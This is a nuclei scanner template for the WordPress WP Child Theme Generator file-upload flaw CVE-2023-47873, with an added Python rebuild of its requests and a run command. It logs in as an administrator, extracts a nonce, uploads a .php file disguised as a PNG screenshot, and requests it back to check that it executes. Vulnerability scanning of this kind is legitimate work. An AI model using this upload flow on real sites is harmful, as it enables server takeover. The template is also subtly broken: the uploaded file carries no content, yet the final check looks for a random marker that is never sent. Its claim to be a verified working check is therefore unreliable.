id: CVE-2023-47873

info:
  name: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
  author: cysamu,Crux
  severity: critical
  description: |
    Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator. This issue affects WP Child Theme Generator from n/a through 1.0.9.
  impact: |
    Authenticated administrators can upload arbitrary PHP files disguised as theme files to execute malicious code on the WordPress server, enabling complete site compromise.
  remediation: Update to version 1.1.3 or later
  reference:
    - https://github.com/certuscyber/cve-pocs/tree/main/CVE-2023-47873
    - https://patchstack.com/database/wordpress/plugin/wp-child-theme-generator/vulnerability/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability
    - https://en-ca.wordpress.org/plugins/wp-child-theme-generator/
    - https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-47873
    cwe-id: CWE-434
    epss-score: 0.02276
    epss-percentile: 0.80965
    cpe: cpe:2.3:a:wensolutions:wp_child_theme_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wensolutions
    product: wp_child_theme_generator
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-child-theme-generator/"
  tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce,vuln

flow: http(1) && http(2) && http(3) && http(4)

variables:
  string: "{{to_lower(rand_base(8))}}"
  name: '{{to_lower(rand_text_alpha(6))}}'
  childauthor: "{{to_lower(rand_base(4))}}"
  description: "{{to_lower(rand_base(5))}}"
  filename: '{{to_lower(rand_text_alpha(6))}}'

http:
  # 1. Authenticate; the template expects an empty 302 that sets the login cookie.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'len(body)==0'
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in_")'
        condition: and
        internal: true

  # 2. Load the plugin page and pull the wp-easy-nonce needed for the form post.
  - raw:
      - |
        GET /wp-admin/themes.php?page=custom-child-theme HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Child Theme Gen")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="wp-easy-nonce" value="([0-9a-zA-Z]+)"
        part: body
        internal: true

  # 3. Create the child theme; the screenshot field carries a .php filename
  #    declared as image/png. The plugin stores it as screenshot.php.
  - raw:
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8

        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childtheme"

        {{name}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childauthor"

        {{childauthor}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="description"

        {{description}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="fileUpload"; filename="{{filename}}.php"
        Content-Type: image/png

        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="wp-easy-nonce"

        {{nonce}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="action"

        child_theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="custom-child-create"

        Create Child Theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "error_type=updated")'
        condition: and
        internal: true

  # 4. Request the stored screenshot as PHP and look for the random marker.
  - raw:
      - |
        GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
# digest: 4a0a0047304502210095e3c6832c3dc8de8268d2a747b1c01bb4cce691b00dbf001cd0c6be84c7b882022006cf50c779ebda8f561bc05fbc3c4d60bec5ae1e5b949c20c29cfaa7fb3678e1:922c64590222798bb761d5b6d8e72950
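The following is an added example, not the nuclei project's template and not the plugin's code. It reproduces the checks the four-request flow above performs (the nonce extractor, the multipart body sent to admin-post.php with a `.php` filename declared as `image/png`, and the three success conditions) as plain Python functions that can be exercised offline against constructed responses. The function names, the sample HTML and the placeholder file bytes are assumptions made for this illustration; the page itself does not show the contents of the uploaded file, so the example takes them as a parameter.

```python
"""Offline stand-in for the four-request nuclei flow above (added example).

Not the nuclei template and not the plugin's code: it mirrors the template's
extractor, multipart request and matchers so they can be checked without a
WordPress target. All sample inputs below are constructed for this example.
"""
import re
from typing import Optional

# Same pattern as the template's regex extractor (group 1 is the nonce value).
NONCE_RE = re.compile(r'name="wp-easy-nonce" value="([0-9a-zA-Z]+)"')
BOUNDARY = "----geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8"


def logged_in(status_code: int, body: str, headers: str) -> bool:
    """Request 1 matcher: an empty 302 that sets the wordpress_logged_in_ cookie."""
    return status_code == 302 and len(body) == 0 and "wordpress_logged_in_" in headers


def extract_nonce(html: str) -> Optional[str]:
    """Request 2 extractor: the wp-easy-nonce hidden field, or None if absent."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_child_theme_upload(name: str, author: str, description: str,
                             nonce: str, php_filename: str, payload: bytes,
                             boundary: str = BOUNDARY) -> bytes:
    """Request 3 body: the child-theme form with a .php 'screenshot'.

    The fileUpload part carries a .php filename but declares image/png. A
    handler that trusts the declared type instead of validating the real
    extension and content is the CWE-434 pattern this template detects.
    ``payload`` is whatever the caller wants stored; the page does not show it.
    """
    def field(fname: str, value: str) -> bytes:
        return (f"--{boundary}\r\n"
                f'Content-Disposition: form-data; name="{fname}"\r\n\r\n'
                f"{value}\r\n").encode()

    file_part = (f"--{boundary}\r\n"
                 f'Content-Disposition: form-data; name="fileUpload"; '
                 f'filename="{php_filename}"\r\n'
                 f"Content-Type: image/png\r\n\r\n").encode() + payload + b"\r\n"

    return b"".join([
        field("childtheme", name),
        field("childauthor", author),
        field("description", description),
        file_part,
        field("wp-easy-nonce", nonce),
        field("action", "child_theme"),
        field("custom-child-create", "Create Child Theme"),
        f"--{boundary}--\r\n".encode(),
    ])


def upload_accepted(status_code: int, location: str) -> bool:
    """Request 3 matcher: redirect whose Location carries error_type=updated."""
    return status_code == 302 and "error_type=updated" in location


def execution_confirmed(status_code: int, body: str, marker: str) -> bool:
    """Request 4 matcher: screenshot.php under the new theme served the marker."""
    return status_code == 200 and marker in body


if __name__ == "__main__":
    # Constructed admin page fragment standing in for the real response.
    page = '<input type="hidden" id="wp-easy-nonce" name="wp-easy-nonce" value="a1b2c3d4e5" />'
    nonce = extract_nonce(page)
    body = build_child_theme_upload("abcdef", "xyz", "desc", nonce,
                                    "qwerty.php", b"constructed-file-bytes")
    print(nonce, len(body))
```

To run the real template, pass the admin credentials the first request needs as template variables, for example `nuclei -t CVE-2023-47873.yaml -u https://target -var username=admin -var password=...` (flag names assumed from the nuclei CLI; check `nuclei -h` for your version). The template is tagged `intrusive` because a successful run leaves a `screenshot.php` in a new theme directory on the target; remove that theme afterwards.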